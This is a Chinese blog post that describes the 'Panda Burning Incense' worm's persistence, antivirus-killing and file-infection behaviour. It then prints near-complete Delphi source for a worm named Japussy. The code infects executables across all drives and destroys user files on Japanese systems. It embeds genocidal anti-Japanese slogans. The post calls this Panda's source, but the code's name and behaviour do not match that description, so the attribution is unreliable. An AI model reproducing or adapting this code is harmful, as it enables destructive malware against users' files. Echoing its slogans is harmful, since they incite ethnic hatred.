飞道的博客

“熊猫烧香”病毒的原理

463人阅读  评论(0)

熊猫烧香” 这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件(gho文件是系统备份工具GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

制作流程:

一、拷贝文件 病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe

二、添加注册表自启动 病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

三、病毒行为 :

  1.  每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序:QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword,并使用键盘映射的方法关闭安全软件IceSword。
  2. 终止系统中以下的进程:Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe
  3. 每隔18秒点击病毒作者指定的网页。
  4. 用命令行检查系统中是否存在共享,共享存在的话就运行net share命令关闭共享。
  5. 每隔6秒删除安全软件在注册表中的键值
  6. 通过修改注册表以下值,从而不显示电脑中隐藏的文件 :HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00
  7. 删除以下服务: navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc 

四、感染文件 病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部,并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一个网址(例如在文件末尾<javascript>window.location.href = "http://网址域名";</javascript>),用户一旦访问了该文件,浏览器就会跳转到该网址,从而达到增加点击量的目的。但病毒不会感染下列系统文件夹中的文件: WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media 。

“熊猫烧香”的源代码:

“熊猫烧香”是用Delphi工具编写的,首先解释一下为什么大部分的病毒木马等黑客软件都是用Delphi语言编写的?

原因:delphi是编译型语言,可以直接生成.exe运行程序,独立使用。C#是解释型的语言,得调用操作系统的dll和ocx,不方便。对于木马病毒来说,用delphi是最好的选择!

  • 编译型语言:有的编程语言要求必须提前将所有源代码一次性转换成二进制指令,也就是生成一个可执行程序(Windows 下的 .exe),比如C语言、C++、Golang、Pascal(Delphi)、汇编等,这种编程语言称为编译型语言,使用的转换工具称为编译器。
  • 解释型语言:有的编程语言可以一边执行一边转换,需要哪些源代码就转换哪些源代码,不会生成可执行程序,比如 Python、Javascript、PHP、Shell、Matlab 等,这种编程语言称为解释型语言,使用的转换工具称为解释器。

  
  1. program Japussy;
  2. uses
  3. Windows, SysUtils, Classes, Graphics, ShellAPI {, Registry} ;
  4. const
  5. HeaderSize = 82432 ; // 病毒体的大小
  6. IconOffset = $12EB8; // PE文件主图标的偏移量
  7. // 在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
  8. // 查找2800000020的十六进制字符串可以找到主图标的偏移量
  9. {
  10. HeaderSize = 38912; //Upx压缩过病毒体的大小
  11. IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
  12. //Upx 1.24W 用法: upx -9 --8086 Japussy.exe
  13. }
  14. IconSize = $2E8; // PE文件主图标的大小--744字节
  15. IconTail = IconOffset + IconSize; // PE文件主图标的尾部
  16. ID = $ 44444444 ; // 感染标记
  17. // 垃圾码,以备写入
  18. Catchword = ' If a race need to be killed out, it must be Yamato. ' +
  19. ' If a country need to be destroyed, it must be Japan! ' +
  20. ' *** W32.Japussy.Worm.A *** ' ;
  21. {$R *.RES}
  22. function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
  23. stdcall; external ' Kernel32.dll ' ; // 函数声明
  24. var
  25. TmpFile: string ;
  26. Si: STARTUPINFO;
  27. Pi: PROCESS_INFORMATION;
  28. IsJap: Boolean = False; // 日文操作系统标记
  29. { 判断是否为Win9x }
  30. function IsWin9x: Boolean;
  31. var
  32. Ver: TOSVersionInfo;
  33. begin
  34. Result : = False;
  35. Ver.dwOSVersionInfoSize : = SizeOf(TOSVersionInfo);
  36. if not GetVersionEx(Ver) then
  37. Exit;
  38. if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
  39. Result : = True;
  40. end;
  41. { 在流之间复制 }
  42. procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  43. dStartPos: Integer; Count: Integer);
  44. var
  45. sCurPos, dCurPos: Integer;
  46. begin
  47. sCurPos : = Src.Position;
  48. dCurPos : = Dst.Position;
  49. Src.Seek(sStartPos, 0 );
  50. Dst.Seek(dStartPos, 0 );
  51. Dst.CopyFrom(Src, Count);
  52. Src.Seek(sCurPos, 0 );
  53. Dst.Seek(dCurPos, 0 );
  54. end;
  55. { 将宿主文件从已感染的PE文件中分离出来,以备使用 }
  56. procedure ExtractFile(FileName: string );
  57. var
  58. sStream, dStream: TFileStream;
  59. begin
  60. try
  61. sStream : = TFileStream.Create(ParamStr( 0 ), fmOpenRead or fmShareDenyNone);
  62. try
  63. dStream : = TFileStream.Create(FileName, fmCreate);
  64. try
  65. sStream.Seek(HeaderSize, 0 ); // 跳过头部的病毒部分
  66. dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
  67. finally
  68. dStream.Free;
  69. end;
  70. finally
  71. sStream.Free;
  72. end;
  73. except
  74. end;
  75. end;
  76. { 填充STARTUPINFO结构 }
  77. procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
  78. begin
  79. Si.cb : = SizeOf(Si);
  80. Si.lpReserved : = nil;
  81. Si.lpDesktop : = nil;
  82. Si.lpTitle : = nil;
  83. Si.dwFlags : = STARTF_USESHOWWINDOW;
  84. Si.wShowWindow : = State;
  85. Si.cbReserved2 : = 0 ;
  86. Si.lpReserved2 : = nil;
  87. end;
  88. { 发带毒邮件 }
  89. procedure SendMail;
  90. begin
  91. // 哪位仁兄愿意完成之?
  92. end;
  93. { 感染PE文件 }
  94. procedure InfectOneFile(FileName: string );
  95. var
  96. HdrStream, SrcStream: TFileStream;
  97. IcoStream, DstStream: TMemoryStream;
  98. iID: LongInt;
  99. aIcon: TIcon;
  100. Infected, IsPE: Boolean;
  101. i: Integer;
  102. Buf: array[ 0 .. 1 ] of Char;
  103. begin
  104. try // 出错则文件正在被使用,退出
  105. if CompareText(FileName, ' JAPUSSY.EXE ' ) = 0 then // 是自己则不感染
  106. Exit;
  107. Infected : = False;
  108. IsPE : = False;
  109. SrcStream : = TFileStream.Create(FileName, fmOpenRead);
  110. try
  111. for i : = 0 to $ 108 do // 检查PE文件头
  112. begin
  113. SrcStream.Seek(i, soFromBeginning);
  114. SrcStream. Read(Buf, 2 );
  115. if (Buf[ 0 ] = # 80 ) and (Buf[ 1 ] = # 69 ) then // PE标记
  116. begin
  117. IsPE : = True; // 是PE文件
  118. Break;
  119. end;
  120. end;
  121. SrcStream.Seek( - 4 , soFromEnd); // 检查感染标记
  122. SrcStream. Read(iID, 4 );
  123. if (iID = ID) or (SrcStream.Size < 10240 ) then // 太小的文件不感染
  124. Infected : = True;
  125. finally
  126. SrcStream.Free;
  127. end;
  128. if Infected or ( not IsPE) then // 如果感染过了或不是PE文件则退出
  129. Exit;
  130. IcoStream : = TMemoryStream.Create;
  131. DstStream : = TMemoryStream.Create;
  132. try
  133. aIcon : = TIcon.Create;
  134. try
  135. // 得到被感染文件的主图标(744字节),存入流
  136. aIcon.ReleaseHandle;
  137. aIcon.Handle : = ExtractIcon(HInstance, PChar(FileName), 0 );
  138. aIcon.SaveToStream(IcoStream);
  139. finally
  140. aIcon.Free;
  141. end;
  142. SrcStream : = TFileStream.Create(FileName, fmOpenRead);
  143. // 头文件
  144. HdrStream : = TFileStream.Create(ParamStr( 0 ), fmOpenRead or fmShareDenyNone);
  145. try
  146. // 写入病毒体主图标之前的数据
  147. CopyStream(HdrStream, 0 , DstStream, 0 , IconOffset);
  148. // 写入目前程序的主图标
  149. CopyStream(IcoStream, 22 , DstStream, IconOffset, IconSize);
  150. // 写入病毒体主图标到病毒体尾部之间的数据
  151. CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
  152. // 写入宿主程序
  153. CopyStream(SrcStream, 0 , DstStream, HeaderSize, SrcStream.Size);
  154. // 写入已感染的标记
  155. DstStream.Seek( 0 , 2 );
  156. iID : = $ 44444444 ;
  157. DstStream. Write(iID, 4 );
  158. finally
  159. HdrStream.Free;
  160. end;
  161. finally
  162. SrcStream.Free;
  163. IcoStream.Free;
  164. DstStream.SaveToFile(FileName); // 替换宿主文件
  165. DstStream.Free;
  166. end;
  167. except;
  168. end;
  169. end;
  170. { 将目标文件写入垃圾码后删除 }
  171. procedure SmashFile(FileName: string );
  172. var
  173. FileHandle: Integer;
  174. i, Size, Mass, Max, Len: Integer;
  175. begin
  176. try
  177. SetFileAttributes(PChar(FileName), 0 ); // 去掉只读属性
  178. FileHandle : = FileOpen(FileName, fmOpenWrite); // 打开文件
  179. try
  180. Size : = GetFileSize(FileHandle, nil); // 文件大小
  181. i : = 0 ;
  182. Randomize;
  183. Max : = Random( 15 ); // 写入垃圾码的随机次数
  184. if Max < 5 then
  185. Max : = 5 ;
  186. Mass : = Size div Max; // 每个间隔块的大小
  187. Len : = Length(Catchword);
  188. while i < Max do
  189. begin
  190. FileSeek(FileHandle, i * Mass, 0 ); // 定位
  191. // 写入垃圾码,将文件彻底破坏掉
  192. FileWrite(FileHandle, Catchword, Len);
  193. Inc(i);
  194. end;
  195. finally
  196. FileClose(FileHandle); // 关闭文件
  197. end;
  198. DeleteFile(PChar(FileName)); // 删除之
  199. except
  200. end;
  201. end;
  202. { 获得可写的驱动器列表 }
  203. function GetDrives: string ;
  204. var
  205. DiskType: Word;
  206. D: Char;
  207. Str: string ;
  208. i: Integer;
  209. begin
  210. for i : = 0 to 25 do // 遍历26个字母
  211. begin
  212. D : = Chr(i + 65 );
  213. Str : = D + ' :';
  214. DiskType : = GetDriveType(PChar(Str));
  215. // 得到本地磁盘和网络盘
  216. if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
  217. Result : = Result + D;
  218. end;
  219. end;
  220. { 遍历目录,感染和摧毁文件 }
  221. procedure LoopFiles(Path, Mask: string );
  222. var
  223. i, Count: Integer;
  224. Fn, Ext: string ;
  225. SubDir: TStrings;
  226. SearchRec: TSearchRec;
  227. Msg: TMsg;
  228. function IsValidDir(SearchRec: TSearchRec): Integer;
  229. begin
  230. if (SearchRec.Attr <> 16 ) and (SearchRec. Name <> ' . ' ) and
  231. (SearchRec. Name <> ' .. ' ) then
  232. Result : = 0 // 不是目录
  233. else if (SearchRec.Attr = 16 ) and (SearchRec. Name <> ' . ' ) and
  234. (SearchRec. Name <> ' .. ' ) then
  235. Result : = 1 // 不是根目录
  236. else Result : = 2 ; // 是根目录
  237. end;
  238. begin
  239. if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0 ) then
  240. begin
  241. repeat
  242. PeekMessage(Msg, 0 , 0 , 0 , PM_REMOVE); // 调整消息队列,避免引起怀疑
  243. if IsValidDir(SearchRec) = 0 then
  244. begin
  245. Fn : = Path + SearchRec. Name;
  246. Ext : = UpperCase(ExtractFileExt(Fn));
  247. if (Ext = ' .EXE ' ) or (Ext = ' .SCR ' ) then
  248. begin
  249. InfectOneFile(Fn); // 感染可执行文件
  250. end
  251. else if (Ext = ' .HTM ' ) or (Ext = ' .HTML ' ) or (Ext = ' .ASP ' ) then
  252. begin
  253. // 感染HTML和ASP文件,将Base64编码后的病毒写入
  254. // 感染浏览此网页的所有用户
  255. // 哪位大兄弟愿意完成之?
  256. end
  257. else if Ext = ' .WAB ' then // Outlook地址簿文件
  258. begin
  259. // 获取Outlook邮件地址
  260. end
  261. else if Ext = ' .ADC ' then // Foxmail地址自动完成文件
  262. begin
  263. // 获取Foxmail邮件地址
  264. end
  265. else if Ext = ' IND ' then // Foxmail地址簿文件
  266. begin
  267. // 获取Foxmail邮件地址
  268. end
  269. else
  270. begin
  271. if IsJap then // 是倭文操作系统
  272. begin
  273. if (Ext = ' .DOC ' ) or (Ext = ' .XLS ' ) or (Ext = ' .MDB ' ) or
  274. (Ext = ' .MP3 ' ) or (Ext = ' .RM ' ) or (Ext = ' .RA ' ) or
  275. (Ext = ' .WMA ' ) or (Ext = ' .ZIP ' ) or (Ext = ' .RAR ' ) or
  276. (Ext = ' .MPEG ' ) or (Ext = ' .ASF ' ) or (Ext = ' .JPG ' ) or
  277. (Ext = ' .JPEG ' ) or (Ext = ' .GIF ' ) or (Ext = ' .SWF ' ) or
  278. (Ext = ' .PDF ' ) or (Ext = ' .CHM ' ) or (Ext = ' .AVI ' ) then
  279. SmashFile(Fn); // 摧毁文件
  280. end;
  281. end;
  282. end;
  283. // 感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
  284. Sleep( 200 );
  285. until (FindNext(SearchRec) <> 0 );
  286. end;
  287. FindClose(SearchRec);
  288. SubDir : = TStringList.Create;
  289. if (FindFirst(Path + ' *.* ' , faDirectory, SearchRec) = 0 ) then
  290. begin
  291. repeat
  292. if IsValidDir(SearchRec) = 1 then
  293. SubDir.Add(SearchRec. Name);
  294. until (FindNext(SearchRec) <> 0 );
  295. end;
  296. FindClose(SearchRec);
  297. Count : = SubDir.Count - 1 ;
  298. for i : = 0 to Count do
  299. LoopFiles(Path + SubDir.Strings + ' ', Mask);
  300. FreeAndNil(SubDir);
  301. end;
  302. { 遍历磁盘上所有的文件 }
  303. procedure InfectFiles;
  304. var
  305. DriverList: string ;
  306. i, Len: Integer;
  307. begin
  308. if GetACP = 932 then // 日文操作系统
  309. IsJap : = True; // 去死吧!
  310. DriverList : = GetDrives; // 得到可写的磁盘列表
  311. Len : = Length(DriverList);
  312. while True do // 死循环
  313. begin
  314. for i : = Len downto 1 do // 遍历每个磁盘驱动器
  315. LoopFiles(DriverList + ' :', ' * . * ' ); //感染之
  316. SendMail; // 发带毒邮件
  317. Sleep( 1000 * 60 * 5 ); // 睡眠5分钟
  318. end;
  319. end;
  320. { 主程序开始 }
  321. begin
  322. if IsWin9x then // 是Win9x
  323. RegisterServiceProcess(GetCurrentProcessID, 1 ) // 注册为服务进程
  324. else // WinNT
  325. begin
  326. // 远程线程映射到Explorer进程
  327. // 哪位兄台愿意完成之?
  328. end;
  329. // 如果是原始病毒体自己
  330. if CompareText(ExtractFileName(ParamStr( 0 )), ' Japussy.exe ' ) = 0 then
  331. InfectFiles // 感染和发邮件
  332. else // 已寄生于宿主程序上了,开始工作
  333. begin
  334. TmpFile : = ParamStr( 0 ); // 创建临时文件
  335. Delete(TmpFile, Length(TmpFile) - 4 , 4 );
  336. TmpFile : = TmpFile + # 32 + ' .exe ' ; // 真正的宿主文件,多一个空格
  337. ExtractFile(TmpFile); // 分离之
  338. FillStartupInfo(Si, SW_SHOWDEFAULT);
  339. CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
  340. 0 , nil, ' . ' , Si, Pi); // 创建新进程运行之
  341. InfectFiles; // 感染和发邮件
  342. end;
  343. end.

 


转载:https://blog.csdn.net/qq15577969/article/details/108719027
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场